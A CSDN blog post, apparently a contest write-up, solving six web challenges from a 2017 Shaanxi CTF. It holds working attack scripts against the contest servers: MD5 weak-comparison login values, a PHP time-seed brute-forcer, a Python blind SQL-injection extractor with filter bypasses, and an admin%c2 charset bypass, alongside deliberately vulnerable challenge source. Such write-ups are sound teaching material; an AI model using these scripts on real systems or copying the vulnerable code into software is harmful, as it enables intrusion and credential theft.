2017 陕西省网络安全技术比赛 Writeup

最新推荐文章于 2023-07-23 09:44:58 发布
最新推荐文章于 2023-07-23 09:44:58 发布
阅读量6.1k 收藏 2
点赞数
分类专栏: write-up
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31481187/article/details/70216950
版权

这次比赛觉得质量挺高的,至少找到了很多盲点,要学习的东西还非常多。

0x01 签到题

首先看源码
这里写图片描述
常见的类型,可以见以前写的博客
直接弱类型比较
Username=QNKCDZO&password=240610708
接着继续看源码
这里写图片描述

直接生成一个json格式的东西发过去就ok 试了好多遍才找到key=0
{‘key’:0}
这里写图片描述

0x02 抽抽奖

一道简单的js调试题目
首先找点击触发事件
这里写图片描述

找到之后下断点,点击按钮,单步调试
在有弹窗的函数出下断点步入
这里写图片描述
这里写图片描述
这里写图片描述

0x03 Wrong

一个备份文件泄露的题目,找到备份文件.index.php.swp
利用vim -r index.php.swp还原

<?php

error_reporting(0);
function create_password($pw_length =  10)
{
$randpwd = "";
for ($i = 0; $i < $pw_length; $i++)
{
$randpwd .= chr(mt_rand(33, 126));
}
return $randpwd;
}

session_start();
mt_srand(time());
$pwd=create_password();

if($pwd==$_GET['pwd'])
{
  if($_SESSION['userLogin']==$_GET['login'])
        echo "Good job, you get the key";
}
else
{echo "Wrong!";}

$_SESSION['userLogin']=create_password(32).rand();
?>

考点很清楚 爆破种子,以前有类似的题目,附上链接
分析一下逻辑可以得到,第一个随机数mt_srand可以用时间种子暴力破解
第二个rand可以利用弱类型比较绕过
左后附上代码

<?php 
function create_password($pw_length =  10)
{
$randpwd = "";
for ($i = 0; $i < $pw_length; $i++)
{
$randpwd .= chr(mt_rand(33, 126));
}
return $randpwd;
}

//$cookie_file = dirname(__FILE__).'/cookie.txt';
//使用上面保存的cookies再次访问
$i = 80;
$time = time();
while($i--)
{
mt_srand($time+$i);
echo  time();
echo 'hhh';
echo $time+$i;
$s = create_password();
$url = "http://117.34.111.15:85/index.php?pwd=$s&login=";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
//curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file); //使用上面获取的cookies
//curl_setopt($ch, CURLOPT_COOKIEJAR,  $cookie_file); //存储cookies
$response = curl_exec($ch);
curl_close($ch);
echo $response;
}
?>

这里写图片描述

0x04 so easy!

这道题挺不错的,学到了很多新姿势
首先看源码

 <?php 

include("config.php");

$conn ->query("set names utf8");

function randStr($lenth=32){
    $strBase = "1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm";
    $str = "";
    while($lenth>0){
      $str.=substr($strBase,rand(0,strlen($strBase)-1),1);
      $lenth --;
    }
   return $str;
}

if($install){
    $sql = "create table `user` (
         `id` int(10) unsigned NOT NULL PRIMARY KEY  AUTO_INCREMENT ,
         `username` varchar(30) NOT NULL,
         `passwd` varchar(32) NOT NULL,
         `role` varchar(30) NOT NULL
       )ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci ";
    if($conn->query($sql)){
       $sql  = "insert into `user`(`username`,`passwd`,`role`) values ('admin','".md5(randStr())."','admin')";
       $conn -> query($sql);
    }
}

function filter($str){
     $filter = "/ |\*|#|;|,|is|union|like|regexp|for|and|or|file|--|\||`|&|".urldecode('%09')."|".urldecode("%0a")."|".urldecode("%0b")."|".urldecode('%0c')."|".urldecode('%0d')."|".urldecode('%a0')."/i"; 
     if(preg_match($filter,$str)){
         die("you can't input this illegal char!");
     }
     return $str; 

}


function show($username){
  global $conn;
  $sql = "select role from `user` where username ='".$username."'";
  $res = $conn ->query($sql);
  if($res->num_rows>0){

      echo "$username is ".$res->fetch_assoc()['role'];
  }else{
      die("Don't have this user!");
  }
}

function login($username,$passwd){
    global $conn;
    global $flag;

    $username = trim(strtolower($username));
    $passwd = trim(strtolower($passwd));
    if($username == 'admin'){
        die("you can't login this as admin!");
    }

    $sql = "select * from `user` where username='".$conn->escape_string($username)."' and passwd='".$conn->escape_string($passwd)."'";
    $res = $conn ->query($sql);
    if($res->num_rows>0){
        if($res->fetch_assoc()['role'] === 'admin') exit($flag);
    }else{
       echo "sorry,username or passwd error!";  
    }

}

function source(){

    highlight_file(__FILE__);
}

$username = isset($_POST['username'])?filter($_POST['username']):"";
$passwd = isset($_POST['passwd'])?filter($_POST['passwd']):"";

$action = isset($_GET['action'])?filter($_GET['action']):"source";

switch($action){
   case "source": source(); break ;
   case "login" : login($username,$passwd);break;
   case "show" : show($username);break;
}

需要注意以下几点
1.数据库不会内容变
2.show函数可以注入能用的字符串有select from () substr ’
3.show 可以盲注

盲注姿势
1.绕过,利用substr(user())from(1)
2.绕过空格 利用()
3.闭合引号,因为没有注释符所以只能用连等式
4.连接符选择 使用/连接

首先找到盲注点
这里写图片描述
写盲注脚本

import requests
string = ''
for i in range(1,33):
    for j in range(1,126):
        url="http://117.34.111.15:89/?action=show"
        s1 = "admin'/1=(ascii(substr((select(passwd)from(user))from({})))={})/'1'='1".format(str(i),j)
        data = {
            'username':s1
        }
        s=requests.post(url=url,data=data)
        content=s.content
        length=len(content)
        print length
        if length != 21:
            string+=chr(j)
            break
    print string

password=37b1d2f04f594bfffc826fd69e389688
下一步用password登录admin,但发现

if($username == 'admin'){
        die("you can't login this as admin!");
    }

    $sql = "select * from `user` where username='".$conn->escape_string($username)."' and passwd='".$conn->escape_string($passwd)."'";

发现不能直接用admin登录
必须利用字符集特征绕过此判断
P牛的文章
就是admin%c2 在php中就不为admin,但在mysql查询的就是为admin,所以可以绕过
原因就是Mysql字段的字符集和php mysqli客户端设置的字符集不相同。Mysql在转换字符集的时候,将不完整的字符给忽略了。
这里写图片描述

0x05 继续抽

这道题和第一个抽抽奖相比质量高得多。
首先经过调试发现运行机制

$(function(){
    var rotateFunc=function(jsctf0,jsctf1,jsctf2){
    $('#lotteryBtn').stopRotate();
    $("#lotteryBtn").rotate({angle:0x0,duration:0x1388,animateTo:jsctf1+0x5a0,callback:function(){
        $.get('get.php?token='+$("#token").val()+"&id="+encode(md5(jsctf2)),function(jsctf3){alert(jsctf3['text'])},'json');
    $.get('token.php',function(jsctf3){$("#token").val(jsctf3)},'json')
}})};
    $("#lotteryBtn").rotate({bind:{click:function(){
        var jsctf0=[0x0];
        jsctf0=jsctf0[Math.floor(Math.random()*jsctf0.length)];
        if(jsctf0==0x1){rotateFunc(0x1,157,'1')};
        if(jsctf0==0x2){rotateFunc(0x2,0xf7,'2')};
        if(jsctf0==0x3){rotateFunc(0x3,0x16,'3')};
        if(jsctf0==0x0){var jsctf1=[0x43,0x70,0xca,0x124,0x151];
            jsctf1=jsctf1[Math.floor(Math.random()*jsctf1.length)];
        rotateFunc(0x0,jsctf1,'0')}}}})})

jsctf 分别为0,1,2,3对应无,一等,二等,三等
重点在这里$.get('get.php?token='+$("#token").val()+"&id="+encode(md5(jsctf2))
token是本页面里的,下次发送数据需要使用,encode函数我们可通过调试得到


function encode(string)
{
    var output='';
    for(var x=0,y=string.length,charCode,hexCode;x<y;++x)
        {
            charCode=string.charCodeAt(x);
            if(128>charCode){charCode+=128}
                else if(127<charCode){charCode-=128}
                charCode=255-charCode;
                hexCode=charCode.toString(16);
                if(2>hexCode.length){hexCode='0'+hexCode}
                    output+=hexCode}
    return output
}

下面就用python暴力跑一下

import requests
import json
from base64 import *
from bs4 import BeautifulSoup
def md5(str):
    import hashlib
    m = hashlib.md5()
    m.update(str)
    return m.hexdigest()
def encode(string):
    output='';
    for i in string:
        charCode = ord(i)
        if 128 > charCode:
            charCode+=128
        elif 127< charCode:
            charCode-=128
        charCode=255-charCode;
        hexCode=hex(charCode)[2:]
        if 2 > len(hexCode):
            hexCode='0'+hexCode
        output+=hexCode
    return output

r = requests.session()
for i in range(1000):
    s = r.get('http://117.34.111.15:81/')
    soup = BeautifulSoup(s.content,'lxml')
    token = soup.input['value']
    idt = encode(md5(str(i)))
    s1 = r.get('http://117.34.111.15:81/get.php?token='+token+'&id='+idt)
    if 'flag{' in json.loads(s1.content)['text']:
        print json.loads(s1.content)['text']
        break

0x06 just a test

直接AVWS扫描
这里写图片描述
再接着用sqlmap跑一下
这里写图片描述
这里写图片描述
这里写图片描述
发现并没有想要的字段
可以报错注入
这里写图片描述
这题想死的心都有了,浪费了好长时间
flag{99cd1872c9b26525a8e5ec878d230caf}

4ct10n
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
山东省大学生网络安全技能大赛决赛Writeup.pdf
09-30
山东省大学生网络安全技能大赛决赛Writeup.pdf
CTF-web 第三部分 代码审计
iamsongyu的博客
10-09 5813
http://www.mxcz.net/tools/rot13.aspx rot-13加密解密 http://www.zjslove.com/3.decode/ 凯撒 当铺 倒叙 维吉尼亚密码 实际上就是阅读有关的校验代码,人为构造特殊的输入或者参数才能拿到flag。需要了解一般的变量命名,判断语句和常用函数等,对于函数的执行流程还是很容易理解的,编程的关键点如下: 一些基本的语法含义 php编程...
WgpSec(狼组安全) CTF PHPCode题目记录
e6678的博客
03-23 1418
PHPCode strcmp 题目描述 <?php include("flag.php"); highlight_file(__FILE__); if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串(区分大小写) die('Flag:
mysql 00FALSE_False注入,以及SQL注入技巧总结
weixin_34976470的博客
01-30 395
title: False注入,以及SQL注入技巧总结date: 2017-04-25 00:23:31tags: ['SQL注入']利用False我们可以绕过一些特定的WAF以及一些未来不确定的因素,其中有些姿势之前了解但是没有去深入,这次做一个归纳总结。0x01 False Injection0 :引子首先我们常见的注入1=10<1''=''这些都是基于1=1这样的值得比较的普通注入,下面...
CTF Lottery
zero
08-11 2375
首先 访问 /robots.txt 或者 /.git/ 发现 Git 仓库可以 GitHack 拿到源码。 漏洞在 api.php function buy($req){ require_registered(); require_min_money(2); $money = $_SESSION['money']; $numbers = $req['numbers']; $win_numbe...
[CTF/网络安全] 攻防世界 lottery 解题详析
等风来
07-23 4153
以上为[CTF/网络安全] 攻防世界 lottery 解题详析,读者可躬身掌握。我是秋说,我们下次见。
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
网络安全管理职业技能竞赛Web writeup1
08-03
网络安全管理职业技能竞赛Web writeup1
网络安全管理职业技能竞赛Web writeup_合天网安学院-程序员宝宝 - 程序员宝宝1
08-03
网络安全管理职业技能竞赛Web writeup_合天网安学院-程序员宝宝 - 程序员宝宝1
bugku——md5()函数
吃肉唐僧的博客
09-01 866
打开题目,又是MD5函数 以为又是一个套路直接md5('240610708') == md5('QNKCDZO')去尝试 结果构造http://123.206.87.240:9009/18.php?username=240610708&&password=QNKCDZO一直失败 后来再审计代码,发现判断的时候用了===, 所以而刚才我用那个的方法MD5只能==弱类型绕过 ...
GitHack改进版(git源码泄露恢复工具)
09-26
GitHack改进版(git源码泄露恢复工具)可以恢复git文件和目录,实现版本还原,比原版的功能更强大
Lotteryjs一个简单的JavaScript抽奖应用基于Zepto或jQuery
08-10
Lottery.js 一个简单的 JavaScript 抽奖应用,基于 Zepto 或 jQuery,快速便捷接入现有系统。
*CTF 2021 lottery again
YuSec
01-19 1681
Start 给了部分源码,先理一遍这个站的逻辑, 首先index.html中是一个登录框,该登录框可以任意注册: 每个新用户有coin:300,可以通过买彩票进行赚钱,赚够9999,即可买到flag: 然后查看源码,找到买彩票的关键代码: app.Http.Controllers.LotteryController.php 28 line: $lottery = Lottery::create(['coin' => 100 - floor(sqrt(random_int(1, 10000)))])
【攻防世界】二十三 --- lottery --- php代码审计
qq_43168364的博客
01-03 561
题目 — lottery 一、writeup 主页网页访问没有反应,附件中给了网站的源代码,对其进行审计。目录结果如下所示 查看几个关键文件中的内容:robots.txt、config.php、index.php robots.txt文件给了一个/.git/目录 config.php中启动了一个会话,给了两个变量 二、知识点 ......
攻防世界-lottery
m0_49025459的博客
12-29 201
注意到这串代码,意思是将传入的数字和随机的数字进行比较,最后对比两者相等的个数来增加相应的钱。这里没有对输入的数据进行任何的过滤,而且对比相等处用的" == “来比较,所以可以用传入” true "来绕过判断。我们随便输入一个用户名,然后随便的输入七个数字,我们查看一下网页调用的流程。我们发现抽奖的时候调用了api.php,我们里面去查看一下代码。多执行几次,攒够钱后买flag。下载附件,打开一看网页源代码。访问题目路径,是个抽奖的网站。
2022年第五空间网络安全大赛WriteUp
渗透测试研究中心
09-22 6652
一、WEB1.web_BaliYun进去之后一个文件上传,而且只能上传图片。访问www.zip拿到源码网站源码:index.php:<?phpinclude("class.php");if(isset($_GET['img_name'])){$down=newcheck_img();#hereecho$down->img_check();}if(isset...
网络安全实验室CTF—选择题解析 writeup
热门推荐
Senimo
08-04 1万+
网络安全实验室CTF—选择题 writeup1.主要用于加密机制的协议是( )2.向有限的空间输入超长的字符串是哪一种攻击手段?( )3.为了防御网络监听,最常用的方法是( )4.使网络服务器中充斥着大量要求回复的信息,消耗带宽,导致网络或系统停止正常服务,这属于什么攻击类型?( )5.用户收到了一封可疑的电子邮件,要求用户提供银行账户及密码,这是属于何种攻击手段?( )6.Window...
2017 陕西网络空间安全技术大赛writeup
Ni9htMar3的博客
04-26 5715
WEB MISC Crypto
蓝帽杯全国大学生网络安全技能大赛
最新发布
08-24
蓝帽杯全国大学生网络安全技能大赛是一项面向全国大学生的网络安全竞赛。该比赛旨在提升大学生的网络安全技能和意识,促进网络安全人才的培养。比赛内容涵盖了各个领域的网络安全知识和技能,包括但不限于电子取证、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值